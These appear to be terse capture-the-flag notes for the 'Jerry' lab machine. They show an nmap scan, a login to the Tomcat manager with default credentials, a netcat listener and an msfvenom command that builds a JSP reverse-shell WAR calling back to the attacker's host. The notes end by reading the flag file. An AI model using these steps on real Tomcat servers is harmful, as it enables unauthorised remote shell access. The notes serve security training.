Jerry
Ip: 10.10.10.95

#####################################################################
nmap -sV -sC -Pn --top-ports 1000 10.10.10.95
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-09 09:46 EDT
Nmap scan report for 10.10.10.95
Host is up (0.10s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.07 seconds

#####################################################################
Open in Browser: http://10.10.10.95:8080/

http://10.10.10.95:8080/manager/html
with user: tomcat and password: s3cret


#####################################################################
nc -lnvp 2007
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.7 LPORT=2007 -f war > shell11.war

cd C:\Users\Administrator\Desktop\flags
type "2 for the price of 1.txt"